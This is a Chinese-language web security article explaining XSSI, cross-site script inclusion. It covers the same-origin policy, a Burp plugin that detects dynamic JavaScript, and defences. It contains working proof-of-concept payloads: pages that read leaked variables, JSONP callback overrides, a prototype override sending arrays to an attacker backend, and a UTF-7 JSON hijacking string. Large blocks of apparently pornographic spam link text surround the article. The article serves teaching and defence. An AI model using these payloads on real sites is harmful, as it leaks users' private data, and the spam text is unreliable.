精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

XSSI: 一個不出名但是影響廣泛的Web漏洞

安全 漏洞
在這篇文章中將演示如果找到XSSI,利用XSSI和如何防護XSSI漏洞。

[[181973]]

前言

找到一個特定類別漏洞兩個關鍵組成部分:對漏洞的認識和找到漏洞的難易。 跨站腳本包含(XSSI)漏洞在事實上的公共標準即:OWASP TOP 10中并未被提及。 另外并沒有公開的利用的工具來促進找到XSSI。它的影響范圍從泄露個人存儲信息,基于TOKEN的協議的規避到完成帳戶的妥協(猜測意思是應該繞過登錄)。 XSSI漏洞相當廣泛, 由于檢測手段的缺失增大了每一個XSSI漏洞的風險。 在這篇文章中我將演示如果找到XSSI,利用XSSI和如何防護XSSI漏洞。

背景知識

這一部分是來講清楚源和同源策略(SOP)的。如果了解這一部分的可以跳過。

源的概念和基于源的Web內容隔離安全機制(即同源策略)由Netscape在引入JAVASCRIPT的時候一同引入。SOP定義了文檔是如何相互影響的。當兩個文檔屬于同一個源時,它們可以相互訪問。這實際上是WEB安全的基礎。源被大多數瀏覽器定義為端口,域名和協議。 而微軟的IE瀏覽器是一個例外,它不包括端口。它有自己的安全意義。下邊的表是由(Mozilla Developer Network)用URL:http://store.company.com/dir/page.html描述了用于SOP的最通用的規則。

由(Mozilla Developer Network)用URL:http://store.company.com/dir/page.html描述了用于SOP的最通用的規則。

由于多家瀏覽器廠商在文檔間的相互作用沒有一個共同的標準,所以內容隔離是一件非常必要的事情。對于更多信息:安全研究員Michal Zalewski在他的書Tangled Web中有一章的內容都是在寫這個問題。

XSSI

Cross-Site Scrite Inclusion(XSSI),一個有些無形但是描述性的名字,指定了一類漏洞:當資源用script標簽來包含時,SOP就失效了,因為腳本必須能夠包含跨域。因此一個攻擊者可以讀取用script標簽包含的所有內容。

當談到動態的JavaScript和jsonp,所謂的權限信息(如cookie)用于身份驗證時會顯得特別有趣。Cookies 與 CSRF一樣,從不同的主機來請求時會被包含。這個漏洞在上述的Michal Zalewski的書中的腳注與Sebastian Lekies等人的paper的腳注中被提到。

根據script中數據的內容不同,XSSI可以有不同的利用方式。在廣泛傳播的敏感數據是個人信息如e-mail, 郵件地址, 生日等。 但是也可以發現tokes, session id,與其它的ID如UID。 最簡單的利用方式是檢查一個用戶是否已經登錄(登錄 oracle)。獲得的信息可以在社會工程或者其它的特定方式的攻擊中被濫用。

與XSS與CSRF的界限

XSSI在命名上與XSS相近,在描述上與CSRF相近。它仨之間的共同點即同為客戶端攻擊。

與XSS的不同是很容易理解的:在一個XSS的中,惡意代碼被放置在受害者的頁面,而XSSI中受害者的代碼被包含在一個惡意頁面中。 而表面上看XSSI與CSRF是很相似的,因為它們都是一個由惡意頁面的請求至另一個域,而且這兩種情況下,請求都是在用戶已經登錄的情況下執行的。 而最關鍵的不同點在于目的。在CSRF中,攻擊都想要受害者的頁面中執行一個狀態改變的動作,比如在一個在線銀行應用中進行轉帳。在XSSI中攻擊者想要跨域泄露數據,以便然后再執行上述的攻擊。

搜索,找到和利用

當搜索XSSI時,需要區分四種情況。但是幸運的是利用方式是相似甚至是相同的(就像反射與存儲的XSS)。我們可以將四種情況區分如下:

1. 靜態的JavaScript(正常XSSI)

2. 靜態的JavaScript,但是僅在認證后可訪問

3. 動態JavaScript

4. 非JavaScript

正常的XSSI

當一個可公開訪問的靜態腳本包含敏感信息時,都可以認為是一個常規的XSSI。在這種情況下,幾乎只有通過讀文件來檢測這種問題。也可以用啟發式,并用正則表達式來找到私鑰,社?;蛘咝畔⒖◣ぬ?。但是一旦情況被確定,利用通常是微不足道的。讓我們假設敏感內容設定在一個全局變量中,如下面的現實例子(替換的私鑰):

  1. var privateKey = "-----BEGIN RSA PRIVATE KEY-----\ 
  2. MIIEpQIBAAKCAQEAxaEY8URy0jFmIKn0s/WK6QS/DusEGRhP4Mc2OwblFQkKXHOs\ 
  3. XYfbVmUCySpWCTsPPiKwG2a7+3e5mq9AsjCGvHyyzNmdEMdXAcdrf45xPS/1yYFG\ 
  4. 0v8xv6QIJnztMl18xWymaA5j2YGQieA/UNUJHJuvuvIMkZYkkeZlExszF2fRSMJH\ 
  5. FUjnFNiYt0R8agdndexvuxFApYG40Hy6BJWgKW3NxowV9XbHOaDvX+3Bal5tbtrM\ 
  6. IzqTptgldzMGs73bJ+7nUqyv7Dicbn1XD4j9XBYy+FOBhVagSztqMFpOFcfAK7Er\ 
  7. sorY0yWN6aBobtENBUPkeqGiHxBAQ42ki9QkUwIDAQABAoIBAQCThrBx2iDEW2/b\ 
  8. TkOG2vK5A3wEDNfgS8/FAbCv23PCgh8j6I1wvGu1UG4F8P6MoXO9dHN14PjOvQ7m\ 
  9. M5Dd82+A4K0wUfn3fnaqs0zByXkqrdSSeVh/RVTDtBUJdhQylqr/TR3ja2qKATf+\ 
  10. VFGva3gDzQwfR3SucSAXcZ9d5d37x4nzFRa8ogNxxkCUy1PYHqnIpB/4MsOL8f0S\ 
  11. F5LR+u/F67GKFzGZXyh1i/tgIHZCOvftmj2DLx/1EoZyiLSnMABt7XmztIqYXTJG\ 
  12. TnXi8ix4vkwUENfveZb9yKrdmrPGITi+f5FYDlyjeSXZYZqAGhSjI69juNn36gCa\ 
  13. 6Idt7I3xAoGBAOenoayBlmGEsWDGL8/XuAUlsceGRSoQ/MrGqx7LSgvkROYDyAfE\ 
  14. Db8vfy6f/qf9OI1EHwzu8QYnwKh8D0zldz9xl9Fwx4k1EIcD2BjTiJMBBk0FeybO\ 
  15. sqe4UwGzJvsTmfhlhJ4zZYLi1wMmkt1q1sMm9gb55nfTUDH8lzWJE/mFAoGBANpm\ 
  16. DcmcaUsSXkbBbmHZiV07EW4BUBpleog6avcNOcdGcylvDs17IwG28toAtOiJqQ/F\ 
  17. qnOqkQ73QXU7HCcmvQoX/tyxJRg/SMO2xMkYeHA+OamMrLvKgbxGLPG5O9Cs8QMl\ 
  18. q944WOrNhSfBE+ghPz4mpBbAxOOw0SoUYwCd52H3AoGAQnTLo8J1UrqPbFTOyJB5\ 
  19. ITjkHHo/g0bmToHZ+3aUYn706Quyqc+rpepJUSXjF2xEefpN8hbmHD7xPSSB+yxl\ 
  20. HlVHGXWCOLF5cVI//zdIGewUU6o73zEy/Xyai4VKrIK+DA2LkxrphzfuOOArB8wr\ 
  21. mkamE/BDFqMPgZeWBWyyx0UCgYEAg9kqp7V6x6yeJ98tEXuv9w3q9ttqDZWIBOgn\ 
  22. nWBpqkl4yuHWMO0O9EELmdrlXKGG5BO0VMH7cuqIpQp7c5NqesaDwZ5cQ6go+KbF\ 
  23. ZJYWV8TpMNfRjEm0SwKerYvjdZaCpiC/AphH7fEHWzmwF+rCcHYJiAb2lnMvw1St\ 
  24. dDjf8H8CgYEA4US7hhi1B2RDSwmNGTTBlGpHqPN73gqx2uOb2VYQTSUA7//b3fkK\ 
  25. pHEXGUaEHxxtEstSOUgT5n1kvo+90x3AbqPg6vAN4TSvX7uYIWENicbutKgjEFJi\ 
  26. TpCpdZksy+sgh/W/h9T7pDH272szBDo6g1TIQMCgPiAt/2yFNWU6Hks=\ 
  27. -----END RSA PRIVATE KEY-----", 
  28.     keys = [ 
  29.       { name: 'Key No 1', apiKey: '0c8aab23-2ab5-46c5-a0f2-e52ecf7d6ea8', privateKey: privateKey }, 
  30.       { name: 'Key No 2', apiKey: '1e4b8312-f767-43eb-a16b-d44d3e471198', privateKey: privateKey } 
  31.     ]; 

簡單的將它包含在你的頁面然后讀變量:

  1. <html> 
  2.   <head> 
  3.     <title>Regular XSSI</title> 
  4.     <script src="https://www.vulnerable-domain.tld/script.js"></script> 
  5.   </head> 
  6.   <body> 
  7.     <script> 
  8.       alert(JSON.stringify(keys[0])); 
  9.     </script> 
  10.   </body> 
  11. </html> 

正常的XSSI

基于xssi的動態JavaScript 與認證的JavaScript的xssi

這兩類有不同的技術背景,雖然這對測試者來說并無關系。幸運的是其發現與利用是相似的。我寫了一個名叫DetectDynamicJSburp插件, 這個插件主要是在審計期間為滲透測試人員進行 web應用檢測。

所有的腳本文件是被動掃描的。之后這個文件會被重新請求,只不過這次沒有cookie。如果接收的文件與原來的文件兩個文件不同,那么將會在target標簽中標記等級為Information 。它能找到動態JavaScript與那些當用戶認證后才能訪問的到的JavaScript。之所以標記為Information ,是因為動態JavaScript并不一定有安全風險。它可以用來處理用戶數據,服務引導,在復雜應用中設置變量和與其他的服務(如追蹤)來共享數據。

基于xssi的動態JavaScript 與認證的JavaScript的xssi

想知道一個文件是否是腳本,那么就需要過濾器了。這個過濾器在經歷不斷變化且正在不斷發展著。目前這個插件檢查文件擴展名為.js,.jsp,與.json。 .json并不是一個正確的腳本擴展名,甚至不是jsonp, 但是這并不妨礙開發者對它的濫用。

為了減少誤報,原始文件的第一個字符判斷不為{,因為這目前并不是一個有效的腳本語法。同時對content-type檢查是否包含 javascript, jscript,

ecmascript和json。過濾器也可以識別burpsuite的mimetype識別方法。如果在stateMimeType或者inferredMimeType中包含script,那么它就會被掃描。旁注:該擴展是在burp的1.6.39版本前開發的,其中對檢測機制進行改進。盡管如此,也偶爾無法檢測到javascript文件。一些過濾器肯定是多余的,但是經驗表明如果試圖減少一些過濾器會導致漏報。為了進一步減少誤報,則檢查原始文件的HTTP響應代碼不是來自30-X。另一個減少誤報的方法:如果第二版的文件(未經認證得到的文件)是一個腳本(非html)且和原始文件不同,那就發送第二次的未認證的請求,來獲得第三版的文件。如果兩個未經認證的文件以不同的響應結束,那么我們可以總結說這是一個通用的動態腳本且不依賴認證。這種情況經常在時間戳和廣告中出現。

ecmascript和json

利用

xssi可以在用戶已經認證的上下文中來竊取私鑰等。濫用的情況受到開發者想像的限制。但是有些情況反復出現,所以我想說明的是這些情況。

變量如果置于全局命名空間,那么它們很容易被讀取。

函數的重寫即使對于一個javascript新手來說也不應該成為一個問題。下面的示例來自于一個真實的案例。網站使用jsonp來回調配置頁面的用戶數據。

  1. angular.callbacks._7({"status":STATUS,"body":{"demographics":{"email":......}}}) 

為了得到信息, function _7 必須被重寫.

  1. <script> 
  2.       var angular = function () { return 1; }; 
  3.       angular.callbacks = function () { return 1; };       
  4.       angular.callbacks._7 = function (leaked) { 
  5.   alert(JSON.stringify(leaked)); 
  6.       };   
  7. </script> 
  8. <script src="https://site.tld/p?jsonp=angular.callbacks._7" type="text/javascript"></script> 

 function _7 必須被重寫.

也可以適用于全局函數。 在這個例子中,甚至不需要重寫函數,只需要提供一個自己的callback函數。

  1. <script> 
  2.       leak = function (leaked) { 
  3.   alert(JSON.stringify(leaked)); 
  4.       };   
  5. </script> 
  6. <script src="https://site.tld/p?jsonp=leak" type="text/javascript"></script> 

 

如果一個變量并沒有在全局命名空間,那么有時候也可以能過prototype tampering來利用。prototype tampering濫用在javascript的設計中,也就是當解釋代碼時,javascript會遍歷prototype 鏈來找到調用的屬性。 下面的例子是在論文The Unexpected Dangers of Dynamic JavaScript 中提取的。演示如何覆蓋類型Array的相關函數并訪問它,非全局變量也可以泄漏。

  1. (function(){ 
  2.   var arr = ["secret1", "secret2", "secret3"]; 
  3.   // intents to slice out first entry 
  4.   var x = arr.slice(1); 
  5.   ... 
  6. })(); 

在原始代碼中,在原始的代碼中我們可以通過slice訪問數組中我們感興趣的數據, 當然攻擊者可以,如上所說的,重寫slice函數以竊取信息。

  1. Array.prototype.slice = function(){ 
  2.   // leaks ["secret1", "secret2", "secret3"] 
  3.   sendToAttackerBackend(this); 
  4. }; 

安全調查員Sebastian Lekies剛剛更新了他的列表。

非腳本的xssi

Takeshi Terada 在他的論文Identifier based XSSI attacks中描述了另一種類型的xssi,通過在腳本標簽中包含CSV文件作為源,使用數據作為變量和函數名稱,能夠跨源地泄露非腳本文件。

第一起公開描述xssi的文檔是在2006年。 Jeremiah Grossman的博客 Advanced Web Attack Techniques using GMail 描述了一個xssi,可能重寫array的構造函數可以讀取到所有google帳號的地址。

在2007年, Joe Walker出版了JSON is not as safe as people think it is 。 他使用了同樣的手段來竊取一個array內的json信息。

也有一些其他相關的攻擊是由將utf-7編碼的內容注入到json中以逃避json格式來進行的。是由Gareth Heyes, Hackvertor的作者, 在他的博客JSON Hijacking 在2011年提出的。在快速測試中,這仍然可能出現了ie和edge中,但是firefox或者chrome并無此問題。

JSON with UTF-7:

  1. [{'friend':'luke','email':'+ACcAfQBdADsAYQBsAGUAcgB0ACgAJwBNAGEAeQAgAHQAaABlACAAZgBvAHIAYwBlACAAYgBlACAAdwBpAHQAaAAgAHkAbwB1ACcAKQA7AFsAewAnAGoAbwBiACcAOgAnAGQAbwBuAGU-'}] 

在攻擊者的頁面包含json:

  1. <script src="http://site.tld/json-utf7.json" type="text/javascript" charset="UTF-7"></script> 

XSSI的防護

開發者永遠也不要把敏感數據放在javascript文件中, 也不要放在jsonp中。這就已經可以阻止1-3這三大類型的大部分攻擊。類型4的漏洞問題通常通過瀏覽器一方來修復。無論如何,將用戶信息保存到json文件然后讀取的行為應該被禁止。

Takeshi Terada論文中描述的最大的bug被修復了。然而總是可能再一次發現相似的bug。至少這可以通過告訴瀏覽器不要再猜測content-type來阻止一部分。一些瀏覽器可以接受尚未標準化的http響應頭X-Content-Type-Option:nosniff來做這些。一個正確的Content-Type對于減少xssi的可能性也有幫助。

責任編輯:趙寧寧 來源: 安全客
相關推薦

2016-06-03 17:23:11

茄子快傳app印度

2024-08-07 08:00:00

2018-11-02 10:09:40

漏洞藍牙芯片

2013-09-03 16:02:50

云計算

2015-02-12 16:34:55

2023-03-20 20:44:45

2020-09-29 10:20:02

Java編程語言

2012-08-17 10:07:58

IBMdW

2021-12-21 06:23:43

TIWAP安全工具滲透測試

2023-11-08 12:21:55

2012-04-26 09:28:39

2016-12-26 16:46:12

2016-03-03 14:29:15

2021-12-21 10:03:24

Log4j漏洞網絡攻擊漏洞

2022-07-22 15:40:26

Atlassian服務器漏洞

2016-10-19 09:00:57

漏洞郵箱秘密

2015-02-10 14:32:37

XSS漏洞XSS

2017-12-12 15:24:32

Web Server單線程實現

2025-02-28 10:23:33

2021-03-08 10:49:11

漏洞攻擊網絡安全
點贊
收藏

51CTO技術棧公眾號

欧美图片自拍偷拍| 欧美色图亚洲自拍| 九九视频在线观看| 六月丁香久久丫| 欧美日韩国产专区| 亚洲精品日韩在线观看| 国产激情视频在线播放| 国产一区二区你懂的| 中文字幕精品www乱入免费视频| 久久婷婷中文字幕| 欧美久久天堂| 亚洲欧美自拍偷拍色图| 精品国产免费人成电影在线观...| 久久久久久久亚洲| 午夜精品免费| 伊人久久五月天| 娇妻高潮浓精白浆xxⅹ| 日韩在线观看不卡| 亚洲18色成人| 婷婷视频在线播放| 国产福利片在线| 国产成人精品免费视频网站| 国产精品久久久久久一区二区 | 99re精彩视频| 久久男人天堂| 亚洲精品伦理在线| 亚洲 国产 欧美一区| 五月婷婷伊人网| 国产成人在线视频网址| 国产精品一区二区电影| 精品国产xxx| 精品成人在线| 欧美成人精品xxx| 欧美人与性囗牲恔配| 久久久久观看| 精品久久久久久久久久久久包黑料 | 无码人妻精品一区二区中文| 国产精品久久久网站| 9191国产精品| 中文字幕av不卡在线| 欧美片第1页| 天天影视涩香欲综合网| 国产乱子伦精品视频| 97电影在线观看| 国产日韩欧美精品在线| 蜜桃日韩视频| 四虎精品在永久在线观看| 国产成a人亚洲| 99porn视频在线| 99热在线只有精品| 国内精品国产成人| 91精品综合久久久久久五月天| 中文字幕欧美色图| 蜜臀va亚洲va欧美va天堂| 热re91久久精品国99热蜜臀| 亚洲第一在线播放| 国产麻豆综合| 日本一区二区在线播放| 亚洲精品男人的天堂| 免费看的黄色欧美网站| 日本国产一区二区三区| av图片在线观看| 久久久久久自在自线| 国产精品久久久久久久9999| 国产免费www| 另类小说视频一区二区| 国产美女被下药99| 国产精品毛片久久久久久久av| 麻豆精品一区二区三区| 亚洲www视频| 亚洲黄色a级片| 9久草视频在线视频精品| 久久国产欧美精品| 国产在线三区| 中文字幕一区二区三区不卡在线 | jizz在线免费观看| 国产精品免费久久久久| 懂色av粉嫩av蜜臀av| 青青在线视频| 精品欧美aⅴ在线网站| 国产v亚洲v天堂无码久久久 | 97视频中文字幕| 色屁屁草草影院ccyycom| 久久九九久久九九| 亚洲欧洲中文| 久草在线资源站资源站| 狠狠久久亚洲欧美专区| 色婷婷成人在线| 精品国产亚洲日本| 日韩av影视在线| 男女全黄做爰文章| 亚洲无吗在线| 国产成人精品999| 国产日产亚洲系列最新| 91视频观看免费| 中国成人在线视频| 超碰资源在线| 欧美精品久久久久久久多人混战| 精品国产aⅴ一区二区三区东京热| 天堂99x99es久久精品免费| 中文字幕免费精品一区| 国产在线观看成人| 日韩福利视频网| 国产精品日韩一区二区| 91在线网址| 亚洲成人一区在线| 911福利视频| 色老板在线视频一区二区| 精品国产欧美一区二区五十路 | 午夜性色一区二区三区免费视频| 4k岛国日韩精品**专区| 国产精品爽爽久久久久久| 91在线视频官网| 在线视频一区观看| 欧洲成人午夜免费大片| 国产精品日本精品| 日本网站在线免费观看| 日韩国产欧美在线观看| 国产精品久久久久久久久久久久午夜片 | 免费在线亚洲| 99精品欧美一区二区三区| 久久伊伊香蕉| 五月天网站亚洲| 久久出品必属精品| 成人羞羞动漫| 88国产精品欧美一区二区三区| 国产日韩欧美视频在线观看| 国产精品你懂的在线| 欧美二区在线视频| 一区二区三区在线资源| 久久精品青青大伊人av| 91在线视频免费播放| 成人国产免费视频| 国产激情片在线观看| 欧美日韩视频免费看| 亚洲人成网7777777国产| 日韩av在线天堂| 国产91综合网| 一本大道东京热无码aⅴ| 日韩成人综合网| 在线免费看av不卡| 国产一区二区视频免费| 久久久久88色偷偷免费| 国产精品无码人妻一区二区在线| www.爱久久| 色综合五月天导航| av av片在线看| 亚洲乱码国产乱码精品精可以看| www.污污视频| 久久久久久久久久久久久久久久久久 | 国产精品主播直播| 国产对白在线播放| 电影一区中文字幕| 久久视频在线免费观看| 国产三级午夜理伦三级| 亚洲免费观看在线视频| 天天干天天曰天天操| 真实国产乱子伦精品一区二区三区 | 18精品爽视频在线观看| 成人性视频免费网站| 国产一二三在线视频| 国产亚洲成av人片在线观黄桃| 国模精品系列视频| 天堂在线视频免费| 欧美视频免费在线观看| 精品无码国产污污污免费网站| 日本aⅴ免费视频一区二区三区| 色爱区成人综合网| 成人综合网站| 久久97久久97精品免视看| 免费国产黄色片| 色综合久久久久| 天天干天天操天天拍| 精品中文字幕一区二区小辣椒 | 亚洲综合影视| 精品电影一区二区三区| 日本道在线观看| 国产欧美精品日韩区二区麻豆天美| 亚洲欧美另类动漫| 99tv成人| 国产精品国色综合久久| 日本电影欧美片| 久久精品视频在线播放| 黄色av中文字幕| 91九色02白丝porn| 四虎影院中文字幕| 99国产精品久久| 视频在线观看免费高清| 亚洲午夜在线| 欧洲高清一区二区| 国产精品久久久久久久久久久久久久久| 久久99精品久久久久久噜噜| 清纯唯美亚洲色图| 欧美日韩aaaaaa| 久久夜色精品亚洲| 国产精品免费av| 国产熟女高潮一区二区三区 | 国产裸体写真av一区二区| 第四色日韩影片| 中文字幕亚洲色图| 可以免费观看的毛片| 欧美系列亚洲系列| 国产无遮挡免费视频| 国产精品免费丝袜| a天堂视频在线观看| 久久成人羞羞网站| jizzjizzxxxx| 欧美.www| 伊人久久大香线蕉精品| 婷婷综合电影| 不卡一区二区三区视频| 久久久加勒比| 日本高清不卡在线| 国内高清免费在线视频| 日韩中文字幕不卡视频| 天堂av一区二区三区| 在线综合视频播放| 最近中文字幕免费观看| 午夜激情久久久| 极品颜值美女露脸啪啪| 欧美国产一区二区| 亚洲黄色免费在线观看| 国产成人精品免费视频网站| 亚洲免费av一区| 日本成人在线一区| 激情六月丁香婷婷| 亚洲欧洲一区二区天堂久久| 亚洲精品天堂成人片av在线播放| 日韩欧美午夜| 日本黑人久久| 亚洲婷婷伊人| 久久精品五月婷婷| 2020最新国产精品| 97碰碰视频| 日韩免费成人| 亚洲尤物视频网| 国产一区二区av在线| 国产在线观看一区二区三区| 97久久网站| 日本一欧美一欧美一亚洲视频| 一区二区乱码| 欧美中文在线字幕| 中国色在线日|韩| 国产91精品高潮白浆喷水| xxxx在线视频| 午夜精品久久久久久久99热 | 男男激情在线| 亚洲精品丝袜日韩| 三级av在线播放| 亚洲欧美中文日韩在线| 欧美孕妇性xxxⅹ精品hd| 精品亚洲国产视频| 三级视频在线| 亚洲视频在线免费看| 国产高清免费av在线| 一区国产精品视频| av福利在线播放| 少妇高潮久久77777| 国产黄色在线免费观看| 另类专区欧美制服同性| 97超碰资源站在线观看| 欧美激情精品久久久久久久变态| 福利小视频在线| 欧美一级在线亚洲天堂| 欧美电影免费观看网站| 国产精品极品尤物在线观看| 国产精品久久久久久久久免费高清| 国产精品一香蕉国产线看观看 | 久久精品综合| 色国产在线视频| 国产一区二区美女诱惑| 年下总裁被打光屁股sp| 91影院在线免费观看| 人妻一区二区视频| 亚洲天天做日日做天天谢日日欢 | 国自产拍偷拍福利精品免费一 | 欧美丰满熟妇bbbbbb| 亚洲国产综合视频在线观看| 欧美亚洲精品天堂| 欧美三级视频在线观看| 99re只有精品| 亚洲精品成a人在线观看| 国产h视频在线观看| 美日韩精品免费视频| 97人澡人人添人人爽欧美| 国产精品成人一区| 欧美在线在线| 欧美xxxx黑人又粗又长密月| 久久美女视频| 浮妇高潮喷白浆视频| 精品亚洲国产成人av制服丝袜| 逼特逼视频在线观看| 国产日产精品一区| 欧美黑吊大战白妞| 91成人在线观看喷潮| 99这里有精品视频| 亚洲人成电影网| 成人性生交大片免费看网站| 国产激情久久久| 亚洲**毛片| 亚洲国产日韩欧美| 一区二区激情| 91视频免费入口| 国产日产欧美一区二区视频| 天堂资源在线播放| 欧美美女视频在线观看| 水中色av综合| 欧美多人爱爱视频网站| 成人在线观看免费播放| 精品人伦一区二区三区| 一级欧洲+日本+国产| 国产免费视频传媒| 成人av在线观| 午夜国产福利一区二区| 色哟哟一区二区在线观看| www.五月天激情| 色偷偷av一区二区三区乱| 日韩理论视频| 国产女人水真多18毛片18精品| 亚洲a在线视频| 午夜dv内射一区二区| 99亚偷拍自图区亚洲| 欧美成人片在线观看| 在线电影国产精品| 国产精品视频一区二区久久| 26uuu另类亚洲欧美日本老年| 日韩欧美另类中文字幕| 亚洲午夜精品一区二区三区| 久久久水蜜桃av免费网站| 中国免费黄色片| 亚洲一区二区三区在线| 国产男女猛烈无遮挡| 最新91在线视频| av有声小说一区二区三区| 快播日韩欧美| 欧美专区在线| 国产呦小j女精品视频| 午夜成人在线视频| 风流老熟女一区二区三区| 九色成人免费视频| 日韩高清一区| 大地资源网在线观看免费官网| 国内精品免费**视频| 男人的天堂久久久| 日韩一区二区精品葵司在线| 成人免费网址| 91黄色精品| 自拍日韩欧美| 中文字幕乱码在线人视频| 亚洲日本韩国一区| 国产日韩欧美中文字幕| 欧美大片免费观看| 国产成人高清精品免费5388| 精品无码一区二区三区在线| 99久久精品国产一区二区三区| 国产精品久久久免费视频| 日韩av在线不卡| 精品91久久| 日韩欧美手机在线| 美女一区二区视频| 免费成人深夜夜行网站| 欧美一区二区三区不卡| 草草影院在线| 久久av免费一区| 日韩黄色一级片| 羞羞在线观看视频| 日韩精品一区在线| 国产社区精品视频| 日本一区视频在线观看| 久久国产精品99久久人人澡| 朝桐光av在线| 精品视频—区二区三区免费| www成人在线视频| 手机福利在线视频| 成人精品国产一区二区4080 | 欧美日韩国产经典色站一区二区三区| 91在线品视觉盛宴免费| 69174成人网| 亚洲美女色禁图| 日本欧美一区二区三区不卡视频| 欧美日韩五月天| 国产99re66在线视频| 欧美日韩精品免费观看| 麻豆91在线看| 日本少妇激情视频| 国产一区二区三区免费视频| 国产专区精品| 国产男女在线观看| 国产精品国产成人国产三级| 男人的天堂a在线| 国产精品爱久久久久久久| 欧美黄色免费| 国产亚洲精品熟女国产成人| 欧美一级理论性理论a| 成年美女黄网站色大片不卡| 自拍偷拍一区二区三区| 99精品国产热久久91蜜凸| 亚洲字幕av一区二区三区四区| 国模精品视频一区二区三区| 99国内精品久久久久久久|